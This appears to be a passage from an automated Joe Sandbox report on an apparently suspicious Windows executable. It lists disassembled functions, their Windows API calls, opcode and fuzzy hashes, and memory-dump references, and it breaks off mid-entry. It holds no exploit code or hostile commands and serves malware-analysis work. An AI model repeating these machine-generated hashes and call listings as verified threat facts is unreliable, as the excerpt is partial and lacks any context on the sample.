                                                                                • Opcode ID: 9798e215e27d5cbf3aefaeebe3a01d38fcbebf301dd469c50244b129051baa19
                                                                                • Instruction ID: fc639010470c4e08c0334ce0fd4f0d0ba4e5681b48e7b9b58c9986f709f3d313
                                                                                • Opcode Fuzzy Hash: 9798e215e27d5cbf3aefaeebe3a01d38fcbebf301dd469c50244b129051baa19
                                                                                • Instruction Fuzzy Hash: 4211A130C0091DD7CF04AFE4E9586FEBF79FF0A310F005085DA81B6245CB7055508B91
                                                                                Function 00632DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00632DC5
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00632DD6
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00632DDD
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00632DE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: 09326d93d4fea2454aa2a91ad71edc359f36d6993a5630d7864c7dab3bf08f25
                                                                                • Instruction ID: 33dd2fb42d4b6a75bd1ca6b05174d9083e81c17f964e0b21d632d08e106aca6d
                                                                                • Opcode Fuzzy Hash: 09326d93d4fea2454aa2a91ad71edc359f36d6993a5630d7864c7dab3bf08f25
                                                                                • Instruction Fuzzy Hash: 6EE06D71101A247ADB202B63DC0DEFB7E6EEF42BB1F001015F106D10809AE19841D6F0
                                                                                Function 00668863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E9693
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96A2
                                                                                  • Part of subcall function 005E9639: BeginPath.GDI32(?), ref: 005E96B9
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96E2
                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00668887
                                                                                • LineTo.GDI32(?,?,?), ref: 00668894
                                                                                • EndPath.GDI32(?), ref: 006688A4
                                                                                • StrokePath.GDI32(?), ref: 006688B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 0a1b10da62eb212acf73720382b4ff200cd683c3373c7bbc4e7acdbd7189ab5c
                                                                                • Instruction ID: 32a2bef9fbc4a3c98e301e1901cfa415da6f9bcecc5deedc3efea6ccf5344ace
                                                                                • Opcode Fuzzy Hash: 0a1b10da62eb212acf73720382b4ff200cd683c3373c7bbc4e7acdbd7189ab5c
                                                                                • Instruction Fuzzy Hash: DEF05E36041659FADB126F94AC0DFDE3F5AAF0A320F048100FA51661E1C7B55511CFE5
                                                                                Function 005E98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 005E98CC
                                                                                • SetTextColor.GDI32(?,?), ref: 005E98D6
                                                                                • SetBkMode.GDI32(?,00000001), ref: 005E98E9
                                                                                • GetStockObject.GDI32(00000005), ref: 005E98F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ModeObjectStockText
                                                                                • String ID:
                                                                                • API String ID: 4037423528-0
                                                                                • Opcode ID: 9c5f453bfcb43e1e0d8872b698df8577ca8b7b3a666cc9f6d9afedb2f5b7d445
                                                                                • Instruction ID: 8d2af7892eb1b3765c0781f5782f2ef160d8a259e7b75cb1d088376722bac863
                                                                                • Opcode Fuzzy Hash: 9c5f453bfcb43e1e0d8872b698df8577ca8b7b3a666cc9f6d9afedb2f5b7d445
                                                                                • Instruction Fuzzy Hash: E0E06531244A80AADB215F78BC09BE97F52AB12335F049219F6FA940E1C7B146509F11
                                                                                Function 0063162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 00631634
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,006311D9), ref: 0063163B
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006311D9), ref: 00631648
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,006311D9), ref: 0063164F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 70088db9da140307b3913abb5a8c67aadc4738c28fbb4ebbb7a88c3cbe3b57bc
                                                                                • Instruction ID: 2c84387f51d553a0066eea0fa63cb323439a27f3966dc19dc8e1c9e576c1f133
                                                                                • Opcode Fuzzy Hash: 70088db9da140307b3913abb5a8c67aadc4738c28fbb4ebbb7a88c3cbe3b57bc
                                                                                • Instruction Fuzzy Hash: C5E08631601611EBD7201FE19D0DFA63B7EAF467A1F144808F685DD080D6B54440C790
                                                                                Function 0062D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 0062D858
                                                                                • GetDC.USER32(00000000), ref: 0062D862
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0062D882
                                                                                • ReleaseDC.USER32(?), ref: 0062D8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 5db9c0863c413274801ee1d3dcffe49e1c6745b7ff7af1d29a8de39d5482cabf
                                                                                • Instruction ID: 493ab8c2829fd371b0b018db4f1264ec927950bfe8f9e0e973ac5fe37712d6c9
                                                                                • Opcode Fuzzy Hash: 5db9c0863c413274801ee1d3dcffe49e1c6745b7ff7af1d29a8de39d5482cabf
                                                                                • Instruction Fuzzy Hash: 9FE01AB5800605EFCB419FA0D80C67DBFB2FB08320F14A40AE88AE7350C7B95901AF54
                                                                                Function 0062D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 0062D86C
                                                                                • GetDC.USER32(00000000), ref: 0062D876
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0062D882
                                                                                • ReleaseDC.USER32(?), ref: 0062D8A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 9578bec4d519ceec8593cb8befc588b06d41212ab12e8d504976de680d586778
                                                                                • Instruction ID: 82f60a94e3acb8b4015d633d24d56356f8516aacfa7097f33516ff7620f9e7d8
                                                                                • Opcode Fuzzy Hash: 9578bec4d519ceec8593cb8befc588b06d41212ab12e8d504976de680d586778
                                                                                • Instruction Fuzzy Hash: D9E012B0800601EFCB50AFA0D80C66DBFB2FB08320B14A40AE88AE7350CBB95901AF54
                                                                                Function 00644D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00644ED4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Connection_wcslen
                                                                                • String ID: *$LPT
                                                                                • API String ID: 1725874428-3443410124
                                                                                • Opcode ID: edc1a8ce4c647163b3a1126a5f6d6dbc2cdfb3cd924f0a8581defbaaab0e4371
                                                                                • Instruction ID: 94ed937bf255bcffbc256496a4c4f069278a567468cd52a5b3c85054b57553a5
                                                                                • Opcode Fuzzy Hash: edc1a8ce4c647163b3a1126a5f6d6dbc2cdfb3cd924f0a8581defbaaab0e4371
                                                                                • Instruction Fuzzy Hash: BE917275A002059FCB14DF58C485FA9BBF6BF88304F158099E80A9F362DB31ED85CB91
                                                                                Function 005FE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 005FE30D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: b2809b64004147b40e563ecf8fcc3c7ef64470ab0a59e18c9640e4af2000c140
                                                                                • Instruction ID: 7a5e67792f688acf887fa66125a9f8b82a589b11bb5af4974b1f3f419e928cf1
                                                                                • Opcode Fuzzy Hash: b2809b64004147b40e563ecf8fcc3c7ef64470ab0a59e18c9640e4af2000c140
                                                                                • Instruction Fuzzy Hash: F8514B61E8D20696CB1D7718CD063BB2FA6BF40740F304D59E1D5463F9EB38ACD19A46
                                                                                Function 00657771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(0062569E,00000000,?,0066CC08,?,00000000,00000000), ref: 006578DD
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • CharUpperBuffW.USER32(0062569E,00000000,?,0066CC08,00000000,?,00000000,00000000), ref: 0065783B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper$_wcslen
                                                                                • String ID: <si
                                                                                • API String ID: 3544283678-3796645423
                                                                                • Opcode ID: bd807c989335d60881be84634166725dad6fa18d2230c0796a1bd10b1333f727
                                                                                • Instruction ID: ceaf47e95b89bfb1da9e955d901a60e33fdc9c317a97c337c96c8f5d3c74ee13
                                                                                • Opcode Fuzzy Hash: bd807c989335d60881be84634166725dad6fa18d2230c0796a1bd10b1333f727
                                                                                • Instruction Fuzzy Hash: 6D61707291411AABCF14EBA8DC95DFDBB79BF54301F440527F942A3291EF305A0ACBA0
                                                                                Function 005EE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: #
                                                                                • API String ID: 0-1885708031
                                                                                • Opcode ID: dc802a5c427044f2d405d6869464020c1a58bc452300fa2bd9228256086602d5
                                                                                • Instruction ID: 727f899d93880361ad7efbd0a8002873808f73c8cea7a01d3345938fb525dbe5
                                                                                • Opcode Fuzzy Hash: dc802a5c427044f2d405d6869464020c1a58bc452300fa2bd9228256086602d5
                                                                                • Instruction Fuzzy Hash: 5A514639600296DFDB18DF68D4466FA7FAAFF55310F248066E8919B3C0D6359D42CBA0
                                                                                Function 005EF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 005EF2A2
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 005EF2BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: bfb0cfaea92d07913273b7660ebbe0e5c8c53cabae7ef7895d8e0ffb918c2363
                                                                                • Instruction ID: 9a4f3355188a16a2f54b0e23b28dc2c050c0574c20b989200415dac7bb2d007f
                                                                                • Opcode Fuzzy Hash: bfb0cfaea92d07913273b7660ebbe0e5c8c53cabae7ef7895d8e0ffb918c2363
                                                                                • Instruction Fuzzy Hash: 90513B714087469BD320AF14DC8ABABBBF8FBC5300F81885EF1D941295EB709529CB66
                                                                                Function 00655745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 006557E0
                                                                                • _wcslen.LIBCMT ref: 006557EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper_wcslen
                                                                                • String ID: CALLARGARRAY
                                                                                • API String ID: 157775604-1150593374
                                                                                • Opcode ID: 9a7c20be8e1e4b2eb8c56541993fea1a580f586e9f355b0509806d8716bb1957
                                                                                • Instruction ID: 32165a254b4e75e64def41b3a04cd784408f040ac24938e882f6415dae9171d3
                                                                                • Opcode Fuzzy Hash: 9a7c20be8e1e4b2eb8c56541993fea1a580f586e9f355b0509806d8716bb1957
                                                                                • Instruction Fuzzy Hash: C741C431E002199FCB14DFA9C8999FEBBB6FF59321F10402AE806A7351E7719D85CB90
                                                                                Function 0064D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0064D130
                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0064D13A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CrackInternet_wcslen
                                                                                • String ID: |
                                                                                • API String ID: 596671847-2343686810
                                                                                • Opcode ID: b10d033532b8712f380e3bc684a25ac8874f8f04cc90cc8831796236225333ca
                                                                                • Instruction ID: e803660c1f9dc4e57d100463858c6151cb071782d65e211e9667a53ad0a4bdd7
                                                                                • Opcode Fuzzy Hash: b10d033532b8712f380e3bc684a25ac8874f8f04cc90cc8831796236225333ca
                                                                                • Instruction Fuzzy Hash: AC312C75D0020AABCF15EFA4CC89AEF7FBAFF44300F00001AF915A6261D731AA06DB50
                                                                                Function 0066356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00663621
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0066365C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: 0dfed3d61adf8d9ec48c088f4b6bbb27ee5a11c0afe0b482b49ba070ab422a9a
                                                                                • Instruction ID: 9b65a9ce59b2b12fb17f06765436d136ee147960fa5d50c325eff8eaa9eafa0e
                                                                                • Opcode Fuzzy Hash: 0dfed3d61adf8d9ec48c088f4b6bbb27ee5a11c0afe0b482b49ba070ab422a9a
                                                                                • Instruction Fuzzy Hash: E4318D71100614AEDB209F78DC80EFB77AAFF89724F00961AF9A5D7390DA71AD81C760
                                                                                Function 00664537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0066461F
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00664634
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: 80804d2e1e7dd2726de9756b0761bc9595d2d32e022f5f195ab519e554411635
                                                                                • Instruction ID: 53b90f3539537b322ce169176998b3bbc42c4e812b32979a1f1c502f33b8fcd2
                                                                                • Opcode Fuzzy Hash: 80804d2e1e7dd2726de9756b0761bc9595d2d32e022f5f195ab519e554411635
                                                                                • Instruction Fuzzy Hash: 5E311874A0120A9FDF14CFA9C990BDA7BB6FF49340F14406AE905EB351DB70A941CF90
                                                                                Function 006631EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0066327C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00663287
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: fe1cc8e53873b9b74c5756c91ffdd992c806ac3fb195192fa1c94940ec98058c
